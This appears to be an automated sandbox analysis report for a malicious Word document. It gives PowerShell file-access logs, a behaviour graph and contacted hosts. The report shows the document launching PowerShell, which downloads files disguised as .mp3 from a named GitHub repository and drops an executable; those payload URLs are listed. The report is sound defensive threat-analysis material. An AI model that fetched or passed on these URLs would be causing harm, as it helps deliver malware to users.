Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 515215 Sample: RfORrHIRNe.doc Startdate: 04/11/2021 Architecture: WINDOWS Score: 96 26 Antivirus detection for dropped file 2->26 28 Antivirus / Scanner detection for submitted sample 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 6 other signatures 2->32 7 WINWORD.EXE 61 63 2->7         started        process3 file4 18 C:\Users\user\...\~DFF551811DB4F781F3.TMP, Composite 7->18 dropped 34 Suspicious powershell command line found 7->34 11 powershell.exe 15 25 7->11         started        signatures5 process6 dnsIp7 22 github.com 140.82.121.3, 443, 49753, 49754 GITHUBUS United States 11->22 24 raw.githubusercontent.com 185.199.108.133, 443, 49755, 49757 FASTLYUS Netherlands 11->24 20 C:\Users\user\AppData\Local\Temp\temp54685, PE32+ 11->20 dropped 36 Powershell drops PE file 11->36 16 conhost.exe 11->16         started        file8 signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.199.108.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS false
140.82.121.3
 github.com United States
36459 GITHUBUS false

Contacted Domains

Name IP Active
github.com 140.82.121.3 true
raw.githubusercontent.com 185.199.108.133 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://github.com/ssbb36/stv/raw/main/2.mp3 false
    		high
    https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3 false
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    http://github.com/ssbb36/stv/raw/main/2.mp3 false
      		high
      http://github.com/ssbb36/stv/raw/main/4.mp3 false
        		high
        https://raw.githubusercontent.com/ssbb36/stv/main/2.mp3 false
        • Avira URL Cloud: safe
        		 unknown